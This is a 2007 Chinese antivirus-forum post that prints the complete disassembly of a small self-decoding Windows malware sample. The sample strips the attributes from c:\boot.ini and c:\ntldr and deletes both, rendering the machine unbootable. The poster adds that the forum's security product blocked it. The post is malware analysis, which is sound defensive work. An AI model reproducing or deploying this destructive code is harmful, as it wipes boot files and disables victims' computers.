反黑先锋
版主
RUNWAY
积分 2901
发帖 2857
注册 2006-6-17
|
#1 垃圾病毒,足以致命
文章转自:win32k
00406000 >/$ /E9 DA000000 jmp 004060DF
00406005 |> |FF15 50704000 /call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
0040600B |. |68 33604000 |push 00406***3 ; /ProcNameOrOrdinal = "DeleteFileA"
00406010 |. |50 |push eax ; |hModule
00406011 |. |FF15 54704000 |call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00406017 |. |A3 66604000 |mov dword ptr [406066], eax
0040601C |. |EB 4C |jmp short 0040606A
0040601E |> |6A 00 |push 0 ; /ExitCode = 0
00406020 |. |FF15 5C704000 |call dword ptr [<&KERNEL32.ExitProces>; \ExitProcess
00406026 |. |6B 65 72 6E 6>|ascii "kernel32.dll",0
00406033 |. |44 65 6C 65 7>|ascii "DeleteFileA",0
0040603F |. |63 3A 5C 62 6>|ascii "c:\boot.ini",0
0040604B |. |63 3A 5C 6E 7>|ascii "c:\ntldr",0
00406054 |. |68 26 60 40 0>|ascii "h&`@",0
00406059 | |EB |db EB
0040605A | |A7 |db A7
0040605B | |00 |db 00
0040605C | |00 |db 00
0040605D | |00 |db 00
0040605E | |00 |db 00
0040605F | |00 |db 00
00406060 | |00 |db 00
00406061 | |00 |db 00
00406062 | |00 |db 00
00406063 | |00 |db 00
00406064 | |00 |db 00
00406065 | |00 |db 00
00406066 |. |AB1E837C |dd kernel32.DeleteFileA
0040606A |> |68 26604000 |push 00406026 ; /FileName = "kernel32.dll"
0040606F |. |FF15 50704000 |call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
00406075 |. |68 C5604000 |push 004060C5 ; /ProcNameOrOrdinal = "SetFileAttributesA"
0040607A |. |50 |push eax ; |hModule
0040607B |. |FF15 54704000 |call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00406081 |. |A3 C1604000 |mov dword ptr [4060C1], eax
00406086 |. |68 80000000 |push 80
0040608B |. |68 3F604000 |push 0040603F ; ASCII "c:\boot.ini"
00406090 |. |FF15 C1604000 |call dword ptr [4060C1]
00406096 |. |68 3F604000 |push 0040603F ; /FileName = "c:\boot.ini"
0040609B |. |FF15 66604000 |call dword ptr [406066] ; \DeleteFileA
004060A1 |. |68 80000000 |push 80
004060A6 |. |68 4B604000 |push 0040604B ; ASCII "c:\ntldr"
004060AB |. |FF15 C1604000 |call dword ptr [4060C1]
004060B1 |. |68 4B604000 |push 0040604B ; /FileName = "c:\ntldr"
004060B6 |. |FF15 66604000 |call dword ptr [406066] ; \DeleteFileA
004060BC |.^|E9 5DFFFFFF |jmp 0040601E
004060C1 |. |00000000 |dd 00000000
004060C5 |. |53 65 74 46 6>|ascii "SetFileAttribute"
004060D5 |. |73 41 00 |ascii "sA",0
004060D8 | |00 |db 00
004060D9 | |60 |db 60 ; CHAR '`'
004060DA | |B8 |db B8
004060DB | |05 |db 05
004060DC | |60 |db 60 ; CHAR '`'
004060DD | |40 |db 40 ; CHAR '@'
004060DE |. |D7 |db D7
004060DF |> \B8 05604000 mov eax, 00406005
004060E4 |> 8038 00 |/cmp byte ptr [eax], 0
004060E7 |. 75 05 ||jnz short 004060EE
004060E9 |. C600 FF ||mov byte ptr [eax], 0FF
004060EC |. EB 11 ||jmp short 004060FF
004060EE |> 56 ||push esi
004060EF |. 8BF0 ||mov esi, eax
004060F1 |. A2 DE604000 ||mov byte ptr [4060DE], al
004060F6 |. 8A06 ||mov al, byte ptr [esi]
004060F8 |. FEC8 ||dec al
004060FA |. 8806 ||mov byte ptr [esi], al
004060FC |. 8BC6 ||mov eax, esi
004060FE |. 5E ||pop esi
004060FF |> 40 ||inc eax
00406100 |. 3D D8604000 ||cmp eax, 004060D8
00406105 |.^ 75 DD |\jnz short 004060E4
00406107 |. 68 26604000 |push 00406026 ; ASCII "kernel32.dll"
0040610C \.^ E9 F4FEFFFF \jmp 00406005
微点拦截
其实boot.ini文件根本不用里,ntldr内部集成了一个,那个只不过是为了多系统判断,删了ntldr系统就挂了
[ Last edited by 反黑先锋 on 2007-10-13 at 15:05 ]
| |
※ ※ ※ 本文纯属【反黑先锋】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
荣先祥藏头诗《赞东方微点》
东风欣传好消息
方策独步世所稀
微妙玄机嵌主动
点睛灭毒堪神笔
 |
|
|
